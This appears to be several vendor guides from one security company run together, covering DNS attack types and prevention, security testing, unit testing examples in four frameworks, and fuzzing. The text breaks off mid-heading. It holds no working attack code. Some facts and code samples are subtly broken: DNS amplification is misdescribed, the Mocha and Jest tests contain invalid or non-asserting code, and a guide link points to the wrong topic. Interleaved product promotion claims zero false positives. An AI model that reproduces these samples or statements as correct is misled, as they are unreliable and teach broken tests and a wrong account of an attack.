What is DNS Attack and How To Prevent Them

Table of Content

  1. What Is DNS?
  2. Why Perform an Attack on the DNS?
  3. What Are the 5 Major DNS Attack Types?
  4. DNS Attack Prevention
  5. How DNS Attacks Can Disrupt Business Operations
  6. DNS Attacks vs DDoS: What’s the Difference?
  7. Best Practices for DNS Security Configuration
  8. How to Detect Early Signs of a DNS Attack
  9. See Additional Guides on Key Cybersecurity Topics

What Is a Domain Name Server (DNS) Attack?

DNS is a fundamental form of communication. It takes user-inputted domains and matches them with an IP address. DNS attacks use this mechanism in order to perform malicious activities. 

For example, DNS tunneling techniques enable threat actors to compromise network connectivity and gain remote access to a targeted server. Other forms of DNS attacks can enable threat actors to take down servers, steal data, lead users to fraudulent sites, and perform Distributed Denial of Service (DDoS) attacks.

This is part of an extensive series of guides about Cybersecurity.

What Is DNS?

Domain name system (DNS) is a protocol that translates a domain name, such as website.com, into an IP address such as 208.38.05.149.

When users type the domain name website.com into a browser, a DNS resolver (a program in the operating system) searches for the numerical IP address or website.com. Here is how it works:

  • The DNS resolver looks up the IP address in its local cache. 
  • If the DNS resolver does not find the address in the cache, it queries a DNS server. 
  • The recursive nature of DNS servers enables them to query one another to find a DNS server that has the correct IP address or to find an authoritative DNS server that stores the canonical mapping of the domain name to its IP address.
  • Once the resolver finds the IP address, it returns it to the requesting program and also caches the address for future use.

Why Perform an Attack on the DNS?

DNS is a fundamental service of the IP network and the internet. This means DNS is required during most exchanges. Communication generally begins with a DNS resolution. If the resolution service becomes unavailable, the majority of applications can no longer function. 

Attackers often try to deny the DNS service by bypassing the protocol standard function, or using bug exploits and flaws. DNS is accepted by all security tools with limited verification on the protocol or the usage. This can open doors to tunneling, data exfiltration and other exploits employing underground communications.

What Are the 5 Major DNS Attack Types?

Here are some of the techniques used for DNS attacks.

1. DNS Tunneling

DNS tunneling involves encoding the data of other programs or protocols within DNS queries and responses. It usually features data payloads that can take over a DNS server and allow attackers to manage the remote server and applications. 

DNS tunneling often relies on the external network connectivity of a compromised system, which provides a way into an internal DNS server with network access. It also requires controlling a server and a domain, which functions as an authoritative server that carries out data payload executable programs as well as server-side tunneling. 

Related content: Read our guide to DNS tunneling

2. DNS Amplification

DNS amplification attacks perform Distributed Denial of Service (DDoS) on a targeted server. This involves exploiting open DNS servers that are publicly available, in order to overwhelm a target with DNS response traffic. 

Typically, an attack starts with the threat actor sending a DNS lookup request to the open DNS server, spoofing the source address to become the target address. Once the DNS server returns the DNS record response, it is passed to the new target, which is controlled by the attacker.

Learn more in our detailed guide to DNS amplification attacks

3. DNS Flood Attack

DNS flood attacks involve using the DNS protocol to carry out a user datagram protocol (UDP) flood. Threat actors deploy valid (but spoofed) DNS request packets at an extremely high packet rate and then create a massive group of source IP addresses. 

Since the requests look valid, the DNS servers of the target start responding to all requests. Next, the DNS server can become overwhelmed by the massive amount of requests. A DNS attack requires a great amount of network resources, which tire out the targeted DNS infrastructure until it is taken offline. As a result, the target’s internet access also goes down. 

4. DNS Spoofing

DNS spoofing, or DNS cache poisoning, involves using altered DNS records to redirect online traffic to a fraudulent site that impersonates the intended destination. Once users reach the fraudulent destination, they are prompted to login into their account. 

Once they enter the information, they essentially give the threat actor the opportunity to steal access credentials as well as any sensitive information typed into the fraudulent login form. Additionally, these malicious websites are often used to install viruses or worms on end users’ computers, providing the threat actor with long-term access to the machine and any data it stores.

Learn more in our detailed guide to DNS flood attacks

5. NXDOMAIN Attack

A DNS NXDOMAIN flood DDoS attack attempts to overwhelm the DNS server using a large volume of requests for invalid or non-existent records. These attacks are often handled by a DNS proxy server that uses up most (or all) of its resources to query the DNS authoritative server. This causes both the DNS Authoritative server and the DNS proxy server to use up all their time handling bad requests. As a result, the response time for legitimate requests slows down until it eventually stops altogether.

DNS Attack Prevention

Here are several ways that can help you protect your organization against DNS attacks:

Keep DNS Resolver Private and Protected

Restrict DNS resolver usage to only users on the network and never leave it open to external users. This can prevent its cache from being poisoned by external actors. 

Configure Your DNS Against Cache Poisoning

Configure security into your DNS software in order to protect your organization against cache poisoning. You can add variability to outgoing requests in order to make it difficult for threat actors to slip in a bogus response and get it accepted. Try randomizing the query ID, for example, or use a random source port instead of UDP port 53.

Securely Manage Your DNS servers

Authoritative servers can be hosted in-house, by a service provider, or through the help of a domain registrar. If you have the required skills and expertise for in-house hosting, you can have full control. If you do not have the required skills and scale, you might benefit from outsourcing this aspect. 

Test Your Web Applications and APIs for DNS Vulnerabilities

Bright automatically scans your apps and APIs for hundreds of vulnerabilities, including DNS security issues.

The generated reports are false-positive free, as Bright validates every finding before reporting it to you. The reports come with clear remediation guidelines for your team. Thanks to Bright’s integration with ticketing tools like JIRA, it is easy to assign issues directly to your developers, for rapid remediation.

How DNS Attacks Can Disrupt Business Operations

DNS issues rarely announce themselves clearly. It usually starts with vague complaints – someone says the app feels slow, another says the site won’t load, and support tickets begin to trickle in. By the time teams realize DNS is involved, users are already impacted.

When DNS fails, it doesn’t just affect one service. Everything that depends on name resolution starts breaking at once – websites, APIs, login flows, email delivery, even internal tooling. From the outside, it looks like the entire system is down, even if the underlying infrastructure is perfectly fine.

That’s what makes DNS attacks so disruptive for businesses. Engineering teams may be chasing application bugs while traffic never even reaches the servers. Meanwhile, customers lose trust quickly. For revenue-facing systems, even short DNS disruptions can translate directly into lost transactions and reputational damage.

DNS Attacks vs DDoS: What’s the Difference?

DNS attacks are often described as a type of DDoS, but in practice, they behave very differently. A classic DDoS attack is about volume – overwhelm a service until it can’t respond anymore. You see traffic spikes, CPU usage jumps, and dashboards light up.

DNS attacks don’t always look like that. Instead of hitting the application, attackers interfere with how users find it in the first place. That might mean poisoning records, abusing resolvers, or overwhelming authoritative DNS servers. The traffic levels may not look extreme, but the effect is the same: users can’t reach the application.

The tricky part is visibility. DDoS problems are noisy and obvious. DNS problems are quiet. Requests just fail or go somewhere unexpected. Without DNS-specific monitoring, teams often waste time debugging the wrong layer before realizing that resolution is the real issue.

Best Practices for DNS Security Configuration

Most DNS problems aren’t caused by sophisticated attackers. They’re caused by assumptions. DNS is often treated as background infrastructure – set it up once and move on. Years later, that configuration is still running while the environment around it has changed completely.

Using a reliable DNS provider with redundancy and built-in protection is usually the first practical step. Running your own DNS can work, but only if you’re prepared to maintain it like any other critical system.

Access control is another common weak spot. DNS records are powerful, yet they’re sometimes editable by too many people or automated processes without safeguards. A single mistake or compromised credential can redirect traffic just as effectively as an external attack.

DNSSEC helps in certain scenarios, especially for public domains, but it’s not a silver bullet. What matters more is treating DNS as production infrastructure – monitored, reviewed, and protected – not something that only gets attention when it breaks.

How to Detect Early Signs of a DNS Attack

DNS attacks are hardest to deal with when you notice them late. Once users start reporting outages, you’re already in response mode. Early detection comes down to watching for subtle changes that usually get ignored.

Resolution failures that spike suddenly, odd increases in NXDOMAIN responses, or DNS lookups that start taking longer than usual are often early signals. On their own, they don’t always look alarming, which is why they get missed.

Another warning sign is inconsistency. If users in one region can access a service while others can’t, DNS should be one of the first things checked. These partial failures are common during DNS-based attacks.

Teams that log and review DNS behavior regularly have a big advantage here. When you know what “normal” looks like, it’s much easier to spot when something starts drifting – and react before it turns into a full outage.

See Additional Guides on Key Cybersecurity Topics

Together with our content partners, we have authored in-depth guides on several other topics that can also be useful as you explore the world of cybersecurity.

Device42

Authored by Faddom

Disaster Recovery

Authored by Cloudian

Deserialization

Authored by Bright Security

Security Testing: 7 Things You Should Test, Tools and Best Practices

Table of Content

  1. What Is Security Testing? 
  2. 7 Criteria to Test for in Security Testing
  3. Common Types of Security Testing Tools
  4. Best Practices for Effective Security Testing
  5. Why Security Testing Is Essential for Risk Reduction
  6. How Security Testing Fits into DevSecOps Workflows
  7. Key Metrics to Evaluate Security Testing Effectiveness
  8. Differences Between Security Testing and Vulnerability Assessment
  9. Security Testing with Bright Security

What Is Security Testing? 

Security testing involves evaluating a computing system’s security features to ensure they function properly and protect the application’s users and data. It typically involves checking for vulnerabilities, identifying risks, and assessing other aspects of security. The goal of the process is to discover potential security breaches, misconfigurations, and malicious code which could compromise the system. Security testing methods include penetration testing, vulnerability scanning, and code reviewss.

Conducting security tests is crucial to secure computing systems and applications against both internal and external threats. It shifts the focus from just delivering functional software or IT services to delivering secure, functional systems. By incorporating these tests during the development and delivery lifecycle, teams can rectify vulnerabilities early, reducing potential damage and costs associated with post-deployment fixes.

Key benefits of security testing include:

  • Sensitive data protection: Security testing identifies and mitigates vulnerabilities that could lead to data breaches. Sensitive information such as personal details, financial data, and intellectual property must be safeguarded to prevent unauthorized access, data leaks, and other security incidents.
  • Improves stakeholder trust: When customers and other stakeholders know their data is protected, they are more likely to trust and engage with a company’s products and services. Conversely, security breaches can severely damage a company’s reputation, customer trust, and financial standing.
  • Supports compliance efforts: Regulations and industry standards like GDPR, HIPAA, and PCI DSS require organizations to adhere to strict security standards. Security testing helps in ensuring that the application meets these legal and regulatory requirements, avoiding costly fines and penalties for non-compliance.

7 Criteria to Test for in Security Testing

1. Confidentiality

Confidentiality in security testing ensures that sensitive data is accessed only by authorized users. Security measures such as encryption, authentication, and access controls help maintain this confidentiality. Regular testing verifies that these measures are effective, thereby preventing unauthorized access to confidential information.

2. Integrity

Integrity in security testing guarantees that the data remains unaltered and accurate, safeguarding it from unauthorized modifications. Hash functions, checksums, and digital signatures are techniques used to ensure data integrity. Testing these methods ensures that only authorized alterations can be made and all data remains trustworthy.

3. Authentication

Authentication verifies the identity of users accessing the system, ensuring only authorized individuals gain access. Various techniques such as passwords, biometric scans, and multi-factor authentication are employed. Security testing evaluates the effectiveness of these authentication mechanisms to guard against unauthorized access.

4. Authorization

Authorization determines what resources and data an authenticated user can access. Role-based access control (RBAC) and attribute-based access control (ABAC) are common methods. Security testing verifies that these authorization policies are correctly implemented and enforced, thereby safeguarding sensitive information and resources.

5. Availability

Availability ensures that systems and applications are accessible and functional when needed. This involves testing for potential downtime, assessing resilience against attacks such as distributed denial of service (DDoS), and ensuring redundant systems are in place. Security testing also checks for quick recovery mechanisms to restore services promptly after an incident.

6. Non-Repudiation

Non-repudiation in security testing ensures that actions and transactions can be traced back to their origin. Techniques such as digital signatures and audit logs help maintain this non-repudiation. Regular security testing checks these traces for authenticity and ensures that they have not been tampered with.

7. Resilience

Resilience in security testing refers to the system’s ability to withstand and recover from security incidents. This includes testing incident response plans, backup systems, and recovery processes. Regular resilience testing ensures that the organization’s response to incidents is swift and effective, minimizing damage and downtime.

Common Types of Security Testing Tools 

SAST (Static Application Security Testing)

Static application security testing (SAST) analyzes source code for vulnerabilities without executing the application. It identifies coding errors that could lead to security breaches. This method enables developers to detect and fix issues early in the development lifecycle, which reduces the cost and complexity of resolving these vulnerabilities later.

SAST tools integrate with development environments, providing real-time feedback. They help enforce secure coding practices consistently, leading to more secure applications. Regular use of SAST tools ensures that code remains secure from the outset, enhancing overall application security.

DAST (Dynamic Application Security Testing)

Dynamic application security testing (DAST) evaluates applications in their running state. Unlike SAST, DAST tests for security flaws while the application is operational. This method mimics the actions of an attacker to uncover vulnerabilities like SQL injection, cross-site scripting, and other runtime issues.

DAST tools do not require access to the source code, making them suitable for testing web services and APIs. Continuous DAST testing helps identify and mitigate security flaws in real-time, reducing the risk of exploitation in live environments.

IAST (Interactive Application Security Testing)

Interactive application security testing (IAST) combines SAST and DAST methodologies to provide a security analysis. IAST tools work inside the application, analyzing and continuously monitoring the code flow and interactions. This method offers detailed insights into where vulnerabilities occur and allows for immediate remediation.

IAST is particularly effective in finding complex vulnerabilities that static and dynamic tests may miss. By combining both methodologies, IAST provides a more accurate assessment of the application’s security posture, enabling more targeted and effective mitigation strategies.

SCA (Software Composition Analysis)

Software composition analysis (SCA) identifies vulnerabilities in third-party components and open-source libraries integrated into an application. SCA tools scan the application’s dependencies and notify developers about known vulnerabilities, license compliance issues, and outdated components.

By using SCA tools, organizations can proactively manage the security and legal risks associated with using third-party software. Regular scans help ensure that all components are up-to-date and compliant, significantly reducing the threat landscape.

MAST (Mobile Application Security Testing)

Mobile application security testing (MAST) focuses on identifying vulnerabilities in mobile applications. MAST tools test for platform-specific vulnerabilities, insecure data storage, improper session handling, and other mobile-specific security issues. Both static and dynamic analysis methods are used to ensure comprehensive testing.

Ensuring mobile application security is crucial, given the increasing use of mobile devices for sensitive transactions. MAST helps organizations protect user data and maintain trust by providing a secure mobile app environment.

RASP (Runtime Application Self-Protection)

Runtime application self-protection (RASP) monitors and protects applications in real-time by embedding security controls within the application during runtime. It can identify and mitigate attacks instantly, providing continuous protection without the need for external intervention.

RASP enhances the security posture by adapting to new threats and vulnerabilities dynamically. It offers immediate defense mechanisms, making applications resilient against attacks and reducing the response time to security incidents.

Best Practices for Effective Security Testing 

Shift Security Testing Left

Shifting security testing left involves integrating security practices early in the software development lifecycle (SDLC). By embedding security testing from the initial phases of design and coding, developers can identify and resolve vulnerabilities before they become critical issues. This proactive approach reduces the likelihood of security flaws making it to production, thereby minimizing the cost and effort required for post-deployment fixes.

Adopting a shift-left strategy encourages a security-first mindset among development teams. Tools like static application security testing (SAST) can be used during coding to catch vulnerabilities in real-time. Continuous integration and delivery (CI/CD) pipelines can include automated security checks, ensuring that each code change is verified for security compliance before merging. This integration leads to more secure software and fosters a culture of security awareness throughout the development process.

Conduct Comprehensive Testing Throughout Development

Conducting security tests at various stages of the SDLC is essential for uncovering different types of vulnerabilities. This includes static testing during development, dynamic testing during staging, and interactive testing in pre-production environments. Combining these approaches ensures that the application is scrutinized from multiple angles, improving the overall security posture.

Developers should employ tools like dynamic application security testing (DAST) to simulate attacks on running applications. Additionally, manual penetration testing by security experts can uncover complex vulnerabilities that automated tools might miss. Regular and thorough testing helps in identifying and mitigating risks promptly, ensuring that security is continuously validated throughout the development process.

Perform Comprehensive Risk Assessments

Comprehensive risk assessments involve evaluating the potential threats and vulnerabilities within an application and their potential impact. By understanding the risk landscape, organizations can prioritize their security efforts effectively, focusing on the most critical areas that could cause significant damage if exploited.

Risk assessments should be conducted periodically and include threat modeling, vulnerability scanning, and impact analysis. These assessments help in identifying the likelihood of various threats and their potential consequences, enabling the development of targeted mitigation strategies. A thorough risk assessment provides a clear understanding of the security posture, guiding the allocation of resources to areas that need the most attention.

Monitor and Analyze Security Metrics

Monitoring and analyzing security metrics is crucial for understanding the effectiveness of security measures and identifying areas for improvement. Key metrics such as the number of vulnerabilities detected, time to resolve security issues, and the frequency of security incidents provide valuable insights into the application’s security health.

Organizations should implement continuous monitoring tools to track these metrics in real-time. Analyzing trends over time helps in identifying patterns, understanding the root causes of recurring issues, and measuring the impact of security initiatives. Regularly reviewing and acting on these metrics ensures that security practices evolve to address emerging threats and vulnerabilities effectively.

Collaborating with Security Experts

Collaboration between developers, IT operations staff, and security experts, a paradigm known as DevSecOps, brings specialized knowledge and skills to the development process, enhancing the overall security of the application. Security experts can provide valuable insights into potential vulnerabilities, best practices, and the latest threat landscape, ensuring that the development team is well-informed and prepared.

Regular engagement with security professionals through code reviews, penetration testing, and security training sessions helps in building a robust security framework. This collaboration ensures that security is not just an afterthought but an integral part of the development process, leading to more secure and resilient applications.

Regularly Updating and Maintaining Security Measures

Regular updates and maintenance of security measures are essential to protect against evolving threats. Security is a dynamic field, with new vulnerabilities and attack vectors emerging constantly. Keeping security tools, libraries, and protocols up-to-date is crucial for maintaining a robust defense against these threats.

Organizations should establish a routine schedule for updating software dependencies, applying security patches, and revisiting security policies. Continuous education and training for development teams on the latest security practices and threat intelligence ensure that they are equipped to handle new challenges. Regular maintenance and updates reinforce the security posture, making the application resilient to both known and emerging threats.

Why Security Testing Is Essential for Risk Reduction

Most security problems don’t start with a big exploit. They start with something small that no one paid attention to. A feature behaves slightly differently than expected. An edge case slips through. An assumption turns out to be wrong. Security testing exists to catch those moments before they turn into incidents.

Teams often think risk comes from “bad code,” but that’s rarely the full story. Risk comes from how systems behave once they’re running. Once users interact with an application, once APIs are chained together, once permissions overlap, things don’t always behave the way the original design intended. Security testing forces teams to look at that reality instead of the plan.

When testing is done properly, it changes how teams think about risk. Instead of guessing which issues matter, they can see which ones are actually reachable and exploitable. That shift alone reduces risk more than chasing long lists of theoretical problems that never show up in practice.

How Security Testing Fits into DevSecOps Workflows

In a DevSecOps setup, security testing works best when it feels boring. Not because it’s unimportant, but because it runs quietly in the background without disrupting delivery. The moment security testing becomes a blocker or a surprise at the end of a sprint, teams start working around it.

Modern workflows move too fast for manual reviews and one-off scans. Security testing has to run alongside builds, deployments, and updates, using the same pipelines developers already rely on. When a change introduces a real issue, the feedback should show up close to that change, not weeks later when context is lost.

The goal isn’t to slow developers down or force them to learn security theory. It’s to surface real problems at the right moment, with enough context that fixing them feels straightforward. When security testing fits naturally into DevSecOps, it stops being “security’s job” and becomes part of how software gets shipped.

Key Metrics to Evaluate Security Testing Effectiveness

If the main success metric for security testing is “number of findings,” something is wrong. High numbers usually mean noise, not protection. The more useful question is whether the testing helps teams make better decisions.

One practical signal is how often findings turn into real fixes. If developers regularly look at results and say, “Yes, this makes sense,” the testing is doing its job. Another signal is time. When testing is effective, issues don’t bounce back and forth between teams. They get fixed without long debates about severity or relevance.

False positives matter more than most teams admit. Every wasted investigation makes the next alert easier to ignore. Over time, good security testing earns trust by being accurate, consistent, and grounded in observable behavior. That trust is what actually makes testing effective.

Differences Between Security Testing and Vulnerability Assessment

Vulnerability assessments and security testing are often treated as the same thing, but they answer different questions. A vulnerability assessment is about coverage. It tells you what might be wrong based on known patterns, configurations, or signatures.

Security testing is about behavior. It asks whether those issues can actually be triggered, abused, or chained together in a real environment. Many findings from assessments never turn into real risk, especially in complex applications where context matters.

Both approaches have value, but they solve different problems. Assessments help teams understand their exposure at a high level. Security testing helps them understand the impact. When teams rely on only one, they either drown in noise or miss issues that only show up at runtime.

Security Testing with Bright Security

Bright Security helps address the shortage of security personnel, enabling AppSec teams to provide governance for security testing, and enabling every developer to run their own security tests. 

Brightempowers developers to incorporate an automated Dynamic Application Security Testing (DAST), earlier than ever before, into their unit testing process so they can resolve security concerns as part of their agile development process. Bright’s DAST platform integrates into the SDLC fully and seamlessly: 

  • Test results are provided to the CISO and the security team, providing complete visibility into vulnerabilities found and remediated
  • Tickets are automatically opened for developers in their bug tracking system so they can be fixed quickly
  • Every security finding is automatically validated, removing false positives and the need for manual validation

Bright Security can scan any target, whether Web Apps, APIs (REST/GraphQL) to help enhance DevSecOps and achieve regulatory compliance with our real-time, false positive free actionable reports of vulnerabilities. In addition, our ML-based DAST solution provides an automated solution to identify Business Logic Vulnerabilities.Learn more about Bright Security testing solutions.

4 Unit Testing Examples: Android, Angular, Node, and React

What Is Unit Testing?

Unit tests are automated tests created by developers to verify that individual components of an application, known as units, are error-free and behave as expected. 

Unit testing is an excellent first step for testing a complex application—developers create unit tests for the smallest testable units, and verify that they are working in isolation. Then they can add integration and acceptance tests to verify that these units are working well together and satisfying user requirements.

A unit can be a function, a procedure, an object, or an entire module. When building unit tests for object-oriented programming (OOP), the unit of testing is typically a complete interface, such as a class or a single method. 

In this article:

Unit Testing Techniques

Structural Unit Testing

Structural testing is a white box testing technique in which a developer designs test cases based on the internal structure of the code, in a white box approach. The approach requires identifying all possible paths through the code. The tester selects test case inputs, executes them, and determines the appropriate output. 

Primary structural testing techniques include:

  • Statement, branch, and path testing—each statement, branch, or path in a program is executed by a test at least once. Statement testing is the most granular option.
  • Conditional testing—allows a developer to selectively determine the path executed by a test, by executing code based on value comparisons.
  • Expression testing—tests the application against different values of a regular expression.

Functional Unit Testing

Functional unit testing is a black box testing technique for testing the functionality of an application component. 

Main functional techniques include:

  • Input domain testing—tests the size and type of input objects and compares objects to equivalence classes.
  • Boundary value analysis—tests are designed to check whether software correctly responds to inputs that go beyond boundary values.
  • Syntax checking—tests that check whether the software correctly interprets input syntax.
  • Equivalent partitioning—a software testing technique that divides the input data of a software unit into data partitions, applying test cases to each partition.

Error-based Techniques

Error-based unit tests should preferably be built by the developers who originally designed the code. Techniques include:

  • Fault seeding—putting known bugs into the code and testing until they are found.
  • Mutation testing—changing certain statements in the source code to see if the test code can detect errors. Mutation tests are expensive to run, especially in very large applications.
  • Historical test data—uses historical information from previous test case executions to calculate the priority of each test case.

Unit Testing Examples

Here are some examples of unit tests in different operating systems.

Unit Tests in Android

You can perform instrumented or local unit tests on Android devices. With instrumented tests, you build and install the app alongside a testing app (these are typically UI tests that launch and interact with the app). Local tests are typically small and focused, running on the host side (e.g., the development server). 

You can build an instrumented test that interacts with the UI on an Android device. For example, you can use a code snippet to click on a “Start” element and verify that it triggers a welcome message element:

// When the Start button is selected
onView(withText("Start"))
    .perform(select())

// Then the Hello message appears 
onView(withText("Hello"))
    .check(matches(isDisplayed()))

Related content: Read our guide to unit testing in Android (coming soon)

Unit Tests in Angular

Angular unit tests can uncover various issues, including logic flaws and malfunctions, by isolating code snippets. Angular helps you write code to test an application’s functions in isolation. Angular’s main testing utility package is TestBed (the other is async).

You can perform a unit test by running the “beforeEach” block and then running a sequence of other blocks such as “it” or “xit” blocks. The other blocks must follow the “beforeEach” block but are otherwise independent. 

For example, the first block in the “describe” container is always “beforeEach”—you can then run additional blocks to compile components and verify that the system creates the tested component. The second block might demonstrate the accessibility of the component’s properties—only the title property is added by default. 

The following code will reveal if the component’s title remains the same as the title you set:

it(`title should be 'example-unit-test'`, async(() => {
     const fixture = TestBed.createComponent(ExampleComponent);
     const app = fixture.debugElement.componentInstance;
     expect(app.title).toEqual('example-unit-test');
}));

You can use a third block to show how your test behaves in a browser environment. Once you’ve created the testing component, the system calls an instance of your component to simulate how it runs on the browser. You can then access child elements of the rendered component by accessing its nativeElement object:

it('title should render in a h2 tag', async(() => {
   const fixture = TestBed.createComponent(ExampleComponent);
   fixture.detectChanges();
   const compiled = fixture.debugElement.nativeElement;
 expect(compiled.querySelector('h2').textContent).toContain(‘Start example-unit-test');
}));

Related content: Read our guide to unit testing in Angular (coming soon)

Unit Tests in Node.js

You can use the Node.js framework to execute server-side JavaScript. This open source platform supports the Mocha JavaScript testing framework (among others). You can use special Mocha keywords in the test API to indicate that your code is a unit test. For example, describe() indicates a group of test cases (arbitrarily nested), while it() indicates a single unit test.

Here is an example of a simple test suiting containing a single test case, using the Chai assertion library: 

const {describe} = require('mocha');

const chai = require('chai');

describe('Example test suite:', function() {
    it('2 === 2 should be true', function() {
        chai(2 === 2);
    });
});

The test’s output should confirm the it( function (in this case, 2 === 2 should be true) with a tick and indicate the passing time in milliseconds. You can use any assertion library, including the built-in Assert library (although this is not recommended).

Related content: Read our guide to unit testing in Node.js (coming soon)

Unit Tests in React 

You can use the open source React Native framework to build and test mobile applications. React offers built-in Jest, a JavaScript test framework with a simple unit testing solution. Because Jest is usually pre-installed in most React Native applications, you only need to open the package.json file and set the Jest preset to React.

In this example, you create a sum function adding two numbers—this should be a simple equation where you already know the answer. You import the sum function into the test file under the title ExampleSumTest.js:

const ExampleSum = require('./ExampleSum');

test('ExampleSum equals 4', () => {
      expect(ExampleSum(2, 2).toBe(4);
});

The output should specify if the test passed, confirming the sum as the expected result, and specifying the passing time in milliseconds:

PASS ./ExampleSumTest.js
✓ ExampleSum equals 4 (5ms)

Related content: Read our guide to unit testing in React (coming soon)

Unit Testing with Bright

Bright is a developer-first Dynamic Application Security Testing (DAST) scanner, the first of its kind to integrate into unit testing, revolutionizing the ability to shift security testing even further left. You can now start to test every component / function at the speed of unit tests, baking security testing across development and CI/CD pipelines to minimize security and technical debt, by scanning early and often, spearheaded by developers. With NO false positives, start trusting your scanner when testing your applications and APIs (SOAP, REST, GraphQL), built for modern technologies and architectures. Sign up now for a free account and read our docs to learn more.

What Is Fuzzing (Fuzz Testing)? Everything You Need to Know

Table of Content

  1. What is Fuzzing?
  2. Why are the World’s Biggest Companies Implementing Fuzz Testing?
  3. Types of Fuzzing Tools
  4. How Does Application Fuzzing Work?
  5. Bright: Fuzz Testing for Application Security
  6. Types of Fuzzing: Mutation, Generation, and Grammar-Based
  7. Common Application Fuzzing. Limitations
  8. Fuzzing Tools and Frameworks You Should Know
  9. Interpreting Application Fuzzing Results and Reducing False Positives
  10. See Additional Guides on Key Machine Learning Topics

What is Fuzzing?

Fuzzing is the art of automatic bug detection. The goal of fuzzing is to stress the application and cause unexpected behavior, resource leaks, or crashes. 

The process involves throwing invalid, unexpected, or random data as inputs at a computer. Fuzzers repeat this process and monitor the environment until they detect a vulnerability. 

Threat actors use fuzzing to find zero-day exploits – this is known as a fuzzing attack. Security professionals, on the other hand, leverage fuzzing techniques to assess the security and stability of applications.

This is part of an extensive series of guides about machine learning.

Why are the World’s Biggest Companies Implementing Fuzz Testing?

Some of the world’s biggest and most respected organizations are implementing fuzzing as part of their quality control and cybersecurity operations:

  • Google uses fuzzing to check and protect millions of lines of code in Chrome. In 2019, Google discovered more than 20,000 vulnerabilities in Chrome via internal fuzz testing.
  • Microsoft uses fuzzing as one of the stages in its software development lifecycle, to find vulnerabilities and improve the stability of its products.
  • The US Department of Defence (DoD) issued a DevSecOps Reference Design and a
    Application Security Guide which both requires fuzz testing as a standard part of software development processes.

These and many other organizations are adopting fuzzing into their standard development processes for several reasons:

  • Fuzzing does not just identify the problem, it also shows the cause of the problem and how an attacker may interact with it in a real-life attack.
  • Fuzzing proves a vulnerability exists, identifying problems without having to sift through false positives.
  • Fuzzing is fully automated, and can run independently for days or even weeks, identifying more and more vulnerabilities in a system under test.
  • Fuzzing is highly useful for developers. The role of developers is to develop and improve product features. While traditional security tools only point out flaws, fuzzers show the result of the flaw and demonstrate the impact of solving it.

Types of Fuzzing Tools

Fuzzing tools can be grouped into four basic types.

Grammar-Based F vs. Mutuation Fuzzing

Grammer-based or mutation fuzzers are defined by the way they handle test case generation. Some fuzzers combine both approaches.

Grammar-based fuzzers generate new test cases from a supplied model. The tester defines a “grammar”, specifying the format of inputs accepted by the application, and can define which parts of the input should be fuzzed. The fuzzer uses this model to generate a large number of inputs, which are similar to legitimate inputs, but violate some of the application’s constraints.

Mutation fuzzers randomly mutate a supplied seed input object. They are not constrained by a specific model, and “go crazy” by generating large numbers of unusual inputs. This can be very successful at identifying new bugs or execution paths that may have not been specified by the user in a grammar-based fuzzer.

Black-Box vs. White-Box Fuzzing

Fuzzers can also be grouped into either black-box or white-box approaches.

Black-box fuzzers don’t have access to program artifacts and are more commonly used by cybersecurity researchers looking for vulnerabilities in commercial products. Black-box fuzzing randomly mutates program inputs and sees how the program reacts to it. It can be highly effective in finding new bugs and security issues.

White-box fuzzers by definition require access to program source code. They are commonly used by red teams working for organizations responsible for systems or by software testing groups.

White-box fuzzing involves sweeping the program and identifying conditional branches and constraints on inputs. The fuzzer then systematically violates each of the constraints and evaluates the response. 

This is a very comprehensive process that, in theory, can access all possible execution paths of the program. It can usually discover more bugs than a black-box approach, but is lacking in that it does not test the software from an external, attacker perspective.

How Does Application Fuzzing Work?

As we established above, fuzzing software  is a great tool capable of finding zero-day vulnerabilities, but how does a fuzzer work?

1. Generating Test Cases

First, test cases are generated. Each security test case can be generated as a random, or semi-random data set, and then sent as input to the application.

The data set can be either generated in conformance to the format requirements of the system’s input, or as a completely malformed chunk of data the system was not meant to understand or process.

What do you think would happen to an application if negative numbers, null characters, or even special characters, were sent to some input fields? Do you know how your application would behave?

2. Interfacing with the Target to Deliver the Input

While fuzz testing, a fuzzer can interface with an application, a protocol, or a file format. While doing that, a fuzzer sends test cases to the target over the network or via a command-line argument of a running application.

Imaginative use cases can reveal ways to expose a relevant piece of code with the right specific data.

3. Monitoring the System to Detect Crashes

The success of a fuzz test is measured by the ability to confirm the impact that a fuzzer has on the targeted application.

Bright: Fuzz Testing for Application Security

Bright is the world’s first AI-Powered Application Security Fuzz-testing tool.

Bright offers the combination of the world’s leading DAST solution and a self-evolving, adaptive-learning fuzzer solution. Bright applies evolution strategies and reinforcement learning to extensively analyze the response of the application and the context of a given attack surface breaking the assumed scope of the target. Bright reports vulnerabilities that are invisible to other, unintelligent fuzz testing tools.

Bright combines different technologies to raise efficiency and performance as the most comprehensive, reliable, and accurate solution. Brightcomes with zero false-positives.

Learn more about Bright Dynamic Application Security Testing

Types of Fuzzing: Mutation, Generation, and Grammar-Based

When people ask what application fuzzing is, they usually want to know how it works in life. The answer usually starts with the types of application fuzzing.

Application fuzzing has types. Mutation-based application fuzzing is a common type of application fuzzing. It takes input and changes it a little. Like changing characters or adding weird values. To see how the application reacts to this new input. Generation-based application fuzzing is different. It makes inputs from scratch using predefined rules. This type of application fuzzing is more controlled. It also needs more setup.

Then there is grammar-based application fuzzing. This type of application fuzzing is useful for formats like XML or JSON. It knows the structure. Makes inputs that are technically good but still unusual. Each type of application fuzzing has its use depending on how the application handles input and where you think the weaknesses are in the application.

Common Application Fuzzing. Limitations

Understanding what application fuzzing is also means knowing where it does not work well. Application fuzzing is powerful. It is not a magic solution that fixes everything.

One common problem is that it does not cover everything. Application fuzzing tools might find inputs but miss deeper logic paths, especially in applications with authentication or multi-step workflows. Another challenge is that it can make a lot of noise. Application fuzzing can cause a lot of crashes or weird behavior that does not always mean there is a weakness.

There is also the problem of context. Application fuzzing tools do not always understand the business logic, so they may miss issues that only appear under certain conditions. Sometimes, setting it up becomes a barrier. Setting up effective application fuzzing takes time. So while application fuzzing is useful, it works best when used with testing approaches.

Fuzzing Tools and Frameworks You Should Know

If you are learning about application fuzzing, you will eventually learn about the tools that make it possible. There are tools, and each tool has a slightly different purpose.

For level or binary application fuzzing tools like American Fuzzy Lop are widely used. They focus on finding crashes by changing inputs. For web applications, tools like Burp Suite or OWASP ZAP have application fuzzing features that let you test parameters and endpoints.

There are also frameworks designed for APIs and structured data, where application fuzzing needs to respect formats. Some teams even build custom application fuzzing tools tailored to their applications. The choice really depends on what you are testing. Web apps, APIs, or system-level code. No single tool is good for every use case.

Interpreting Application Fuzzing Results and Reducing False Positives

